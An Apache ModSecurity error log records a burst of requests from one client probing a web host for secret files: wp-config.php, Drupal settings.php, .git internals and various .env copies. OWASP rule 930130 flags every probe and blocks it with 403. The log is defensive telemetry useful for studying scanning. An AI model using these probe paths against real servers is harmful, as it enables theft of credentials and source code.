[Mon May 11 15:23:23.201622 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYS6t2WtvoFr7xvGzVTgAAAIQ"]
[Mon May 11 15:23:23.201816 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYS6t2WtvoFr7xvGzVTgAAAIQ"]
[Mon May 11 15:23:23.203170 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:47148] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYS6O9RdIr1DwxYR2TOwAAAME"]
[Mon May 11 15:23:23.203305 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:47148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYS6O9RdIr1DwxYR2TOwAAAME"]
[Mon May 11 15:23:23.203502 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:47148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYS6O9RdIr1DwxYR2TOwAAAME"]
[Mon May 11 15:23:23.203688 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:47210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYS6y-5-wpj6Sx56aZSgAAAAY"]
[Mon May 11 15:23:23.203844 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:47210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYS6y-5-wpj6Sx56aZSgAAAAY"]
[Mon May 11 15:23:23.204061 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:47210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYS6y-5-wpj6Sx56aZSgAAAAY"]
[Mon May 11 15:23:23.208845 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:47054] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYS1chVQ3tCn0m9OpZngAAARE"]
[Mon May 11 15:23:23.208848 2026] [security2:error] [pid 1319886:tid 1319923] [client 195.178.110.133:47112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYS6y-5-wpj6Sx56aZSwAAAA8"]
[Mon May 11 15:23:23.208990 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:47054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYS1chVQ3tCn0m9OpZngAAARE"]
[Mon May 11 15:23:23.208990 2026] [security2:error] [pid 1319886:tid 1319923] [client 195.178.110.133:47112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYS6y-5-wpj6Sx56aZSwAAAA8"]
[Mon May 11 15:23:23.209203 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:47054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYS1chVQ3tCn0m9OpZngAAARE"]
[Mon May 11 15:23:23.209215 2026] [security2:error] [pid 1319886:tid 1319923] [client 195.178.110.133:47112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYS6y-5-wpj6Sx56aZSwAAAA8"]
[Mon May 11 15:23:23.211866 2026] [security2:error] [pid 1319886:tid 1319899] [client 195.178.110.133:47118] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYS6y-5-wpj6Sx56aZTAAAAAE"]
[Mon May 11 15:23:23.212096 2026] [security2:error] [pid 1319886:tid 1319899] [client 195.178.110.133:47118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYS6y-5-wpj6Sx56aZTAAAAAE"]
[Mon May 11 15:23:23.212335 2026] [security2:error] [pid 1319886:tid 1319899] [client 195.178.110.133:47118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYS6y-5-wpj6Sx56aZTAAAAAE"]
[Mon May 11 15:23:23.212745 2026] [security2:error] [pid 1319953:tid 1319978] [client 195.178.110.133:47104] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYS-SQ-m-m0ukSShuCaQAAAVc"]
[Mon May 11 15:23:23.212881 2026] [security2:error] [pid 1319953:tid 1319978] [client 195.178.110.133:47104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYS-SQ-m-m0ukSShuCaQAAAVc"]
[Mon May 11 15:23:23.213067 2026] [security2:error] [pid 1319953:tid 1319978] [client 195.178.110.133:47104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYS-SQ-m-m0ukSShuCaQAAAVc"]
[Mon May 11 15:23:23.215653 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:47138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYS6y-5-wpj6Sx56aZTQAAAA0"]
[Mon May 11 15:23:23.215778 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:47138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYS6y-5-wpj6Sx56aZTQAAAA0"]
[Mon May 11 15:23:23.215958 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:47138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYS6y-5-wpj6Sx56aZTQAAAA0"]
[Mon May 11 15:23:23.219984 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYS-JEyNRN152ArOSNZAAAAFM"]
[Mon May 11 15:23:23.220115 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYS-JEyNRN152ArOSNZAAAAFM"]
[Mon May 11 15:23:23.220324 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYS-JEyNRN152ArOSNZAAAAFM"]
[Mon May 11 15:23:23.221108 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYS6t2WtvoFr7xvGzVUAAAAIQ"]
[Mon May 11 15:23:23.221242 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYS6t2WtvoFr7xvGzVUAAAAIQ"]
[Mon May 11 15:23:23.221429 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYS6t2WtvoFr7xvGzVUAAAAIQ"]
[Mon May 11 15:23:23.222690 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:47148] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYS6O9RdIr1DwxYR2TPgAAAME"]
[Mon May 11 15:23:23.222815 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:47148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYS6O9RdIr1DwxYR2TPgAAAME"]
[Mon May 11 15:23:23.223013 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:47148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYS6O9RdIr1DwxYR2TPgAAAME"]
[Mon May 11 15:23:23.224183 2026] [security2:error] [pid 1320674:tid 1320694] [client 195.178.110.133:47186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYS6O9RdIr1DwxYR2TPwAAAMQ"]
[Mon May 11 15:23:23.224320 2026] [security2:error] [pid 1320674:tid 1320694] [client 195.178.110.133:47186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYS6O9RdIr1DwxYR2TPwAAAMQ"]
[Mon May 11 15:23:23.224586 2026] [security2:error] [pid 1320674:tid 1320694] [client 195.178.110.133:47186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYS6O9RdIr1DwxYR2TPwAAAMQ"]
[Mon May 11 15:23:23.225966 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.229726 2026] [security2:error] [pid 1319886:tid 1319899] [client 195.178.110.133:47118] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYS6y-5-wpj6Sx56aZTwAAAAE"]
[Mon May 11 15:23:23.229881 2026] [security2:error] [pid 1319886:tid 1319899] [client 195.178.110.133:47118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYS6y-5-wpj6Sx56aZTwAAAAE"]
[Mon May 11 15:23:23.230087 2026] [security2:error] [pid 1319886:tid 1319899] [client 195.178.110.133:47118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYS6y-5-wpj6Sx56aZTwAAAAE"]
[Mon May 11 15:23:23.232970 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:47162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYS6O9RdIr1DwxYR2TQAAAAMg"]
